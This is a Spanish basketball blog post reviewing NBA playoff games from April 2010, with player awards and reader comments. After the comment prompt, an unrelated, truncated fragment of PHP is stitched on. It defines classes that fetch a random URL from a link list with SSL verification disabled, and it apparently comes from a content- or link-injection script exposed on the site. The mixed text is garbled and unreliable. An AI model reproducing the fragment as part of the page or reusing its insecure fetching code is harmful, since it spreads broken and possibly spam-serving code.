Playoffs 29/04/2010: Nuevos horizontes

30 de April de 2010 por TheDeerHunter

“I wanted to obviously have a long playoff run and go for my dream again. Now it’s obviously too shocking and too disappointing. I haven’t really thought about anything about my future yet. I guess I’ve got some time now to think about some stuff and think about my options. We’ll just have to wait and see. Like I said, everything is too fresh now.” – Dirk Nowitzki.

No nos cuesta mucho imaginar la decepción de Dirk Nowitzki y los Mavs. A veces un momento como éste resulta tan fascinante como las grandes victorias y gestas porque humaniza a aquellos semidioses capaces de hacer cosas sobrehumanas. A veces verles fracasar y volver a levantarse es algo motivador. El problema del alemán y su equipo de toda la vida es que lo han hecho juntos demasiadas veces. Demasiados sueños rotos. Oportunidades perdidas. Ambiciones y proyectos malogrados. Llega un punto en que el asunto deja de pertenecer a lo común y solidario. Lo que antaño era una simbiosis podría convertirse en la peor de las prisiones. Siempre hay que mirar hacia delante y anoche pudimos haber visto la última flecha lanzada por “Robin Hood” con la camiseta de los Dallas Mavericks.

No falló Dirk anoche, como no lo hace casi nunca. Dio cada gota de su sangre como lo ha hecho toda la vida y no fue suficiente. La grandísima plantilla que le han montado a su alrededor no ha marcado diferencias. No lo ha hecho Kidd, ni Terry, ni Haywood, ni Dampier, ni Marion, ni Barea, ni mucho menos Deshawn Stevenson. Lo poco bueno que hubo anoche, además de Butler, fue el paso adelante del joven Beaubois. El que un jugador de su experiencia tenga que tirar del carro suele ser porque las cosas no marchan.

Popovic es mucho Popovic. Y los Spurs, que muchos daban por acabadísimos y por el equipo más atractivo como rival de primera ronda son un bocado indigesto. Dominaron el choque decisivo de cabo a rabo con actuación destacada, una vez más de Ginobili y Hill y el trabajo más oscuro de Duncan y Parker. El viejo “sargento de hierro” no necesita mucho más. Eso y un buen número de gladiadores que no le importe dejarse la piel sin salir en la foto.

Lo saben muy bien en Phoenix. Demasiadas batallas les han levantado ya, por lo civil o por lo criminal. Tanto da.  Se avecina la madre de todas las revanchas. Anoche disiparon todas las dudas en el mismo Rose Garden. La guardia pretoriana de McMillan hincó la rodilla al unísono. Aldridge y Roy muy desacertados; Batum, Camby y Miller inoperantes; Bayless, que volvía sumiso al banco, en el mejor de los casos voluntarioso y Howard “missing in action”. Es triste que tuvieran que ser Webster y Rudy los que le dieran al asunto un poco de “vidilla”. Quizás también hayamos visto el último triple de Rudy a las órdenes de “su gran valedor” McMillan.

Los Suns no necesitaron deslumbrar para cerrar la serie. Muy bien Richardson, el líder durante la misma. Correcto Stoudamire, muy generoso Grant Hill… y buenas actuaciones de Dudley y Dragic desde el banco.

PREMIOS

MVP: Vaya Playoffs que se está marcando Jason Richardson. Con los 28 puntos de ayer ya promedía 23.5 con un 52.7% de acierto en tiros de campo. ¡Ojito que son 7.5 puntos más que en liga regular!

Rookie: Al fin decidió Carlisle dar rienda suelta a Rodrigue Beaubois en Playoffs y el de Guadalupe ha respondido a la perfección con 16 puntos y 5 rebotes. Algo tarde, eso sí…

Sorpresa: Rudy Fernandez encontró un golpe de inspiración y clavó 5 de los 6 triples que intentó. Es lo que tiene ser simplemente un tirador: cuando entran eres el héroe, cuando fallas, el villano. Ayer tocó héroe.

Decepción: Entre Kidd, Marion, Haywood, Terry, Barea y Dampier anotaron 13 puntos, pero de todas maneras Rick Carlisle también merece ser apuntado con el dedo. Ha demostrado no saber jugar en Playoffs. Definitivamente.

Esfuerzo en vano: Una decepción más para un Dirk Nowitzki que posiblemente ha perdido definitivamente el tren para conseguir un anillo (al menos con los Mavs). Sus 33 puntos de ayer sirvieron de bien poca cosa. ¿La historia de su carrera?

Y MAÑANA…

El ritmo no para y en 2 días, ¡empieza la segunda ronda! Pero antes, Lakers y Thunder tienen cuentas pendientes aunque los pronósticos hablan de un séptimo partido en el Staples. Por su parte, los Jazz se enfrentan a su segundo match-ball esta vez rodeados de sus incondicionales y los Bucks pueden dar la gran sorpresa de estos playoffs si les da por eliminar a los Hawks. Apasionante, un día más.

Comenta

56 comentarios a esta entrada

  1. LEmontus dice:
    #1

    en cuanto a lo de plantilla sobre el papel si es buena.

    Kidd: M imagino que se retirará ya totalmente inofensivo en RS bien pero los jugadores buenos es en po donde tiene que jugar.

    Butler: Si estéticamente gusta a todos a mi me gusta, pero creo que se desinfla en cada partido aunque la verdad que no es una mala opción en ataque.

    Dampier: Para mí es mejor defensor que haywood buen morlaco y buen defensor deja de contar,

    Terry: Creo que es simplente un jugador de Rs, que pena da verlo tirar en Po.

    JJ Barea: Buen base suplente.

    Marion:Como ya lo habeis definido HA SIDO all star ahora le cambias el nombre y pocos minutos tendríacon cualquier entrenador.

    a mi me indignan estos Cavs que quieres que te diga , no puedo ver a un Kidd como el de ayer y ¿cómo se puede elminiar un equipo con un tio como Dirk contra SAS?. Me indigno.

      Citar

  2. LEmontus dice:
    #2

    Amm para mi la mayor sorpresa de todos los po será ésta, pero mas porque SAS haya ganado que por la eliminación de MAVS.

      Citar

  3. Viva_Dirk dice:
    #3

    Creo que Dallas tiene muchos jugadores ‘válidos’, ahora bien del nivel de Parker, Ginobili, Lewis, Carter o Stoudamire si acaso tienen a Butler acompañando a Dirk, el resto como tercera espada son una patraña, y eso es precisamente lo que es Terry en este equipo, la tercera baza ofensiva. Y los jugadores ‘válidos’ en algun momento tienen que dar realmente la talla como lo hicieron Ariza, PJ Brown o Haslem en su momento.

    El tema de Kidd lo que hace es perjudicar a los Mavs, porque como ha sido un megacrack parece que el hecho de tenerlo debe hacerte mejor que si tienes a Parker o incluso a Westbrook y la realidad es que Kidd ha aportado muy muy poco en esta serie, y en el juego que siempre le ha gustado a Carlisle no se siente cómodo.

    El tema del entrenador es a parte, para mi ha sido siempre el gran mal de Cuban.

      Citar

  4. Mariano dice:
    #4

    LEmonuts, por que subestimas tanto a estos Spurs?

    y yo que los veo candidatos al titulo..

    a Phoenix le van a ganar 4-2, nuevamente..

      Citar

  5. kantonyo dice:
    #5

    Vaya, partido que veo de Bucks, y derrota, al final le voy a dar gafe, siempre que le veo juegan como el culo.

    Aunque viendo el partido de hoy entiendo perfectamente los apuros que pueden pasar los Hawks. El banquillo de Atlanta es bastante flojo. Cuando Horford está en pista, Atlanta tiene bastante superioridad, en la serie con Horford en el campo hay un balance de +40. Todo lo contrario ocurre con Pachulia -37, el viejo Thomas se lo merienda cuando sale el suplente.

    Por cierto, Brandon me sigue pareciendo un bluff, 2 miseros puntos en toda la primera parte, es una pena, pero hay jugadores mejores que no tienen tantas oportunidades. No tiene cabeza, cuando Bucks ha estado a punto de remontar gracias a varias decisiones de los arbitros, se ha vuelto loco y ha perdido unas cuantas jugadas que podían haber puesto las cosas igualadas.

    Delfino ha empezado bien el partido pero luego ha desaparecido. Está siendo muy irregular en estos playoffs, su acierto en 3p le está salvando. 11 de 32 en tiros de 2puntos. En sus internadas ni puntua ni provoca faltas.

    La sensación que me dejan Bucks, es que podrán pasar de eliminatoria, pero no veo buenos jugadores. Salmons te puede tener un buen dia y meterte todo lo que tira, pero sigue siendo un segundon.

    La clave de esta igualdad en la serie, repito está en la corta plantilla de Hawks, y eso que Crawford ha sido eleigod mejor 6º hombre, a partir de Crawford: LA NADA. En equipos titulares un dato de la serie +/-

    Delfino -35, Mbah -12, Thomas +19, Salmons +18, Jennings +3
    Williams -8, Smith +4, Horford +40, Johnson +34, Bibby +37

      Citar

  6. Tobal dice:
    #6

    Lo de los Mavericks es una pena año tras año,desde que perdieron la final frente a Miami,no levantan cabeza en los play offs,es una lástima que un jugadorazo como Nowitzki se quedará sin ganar un anillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>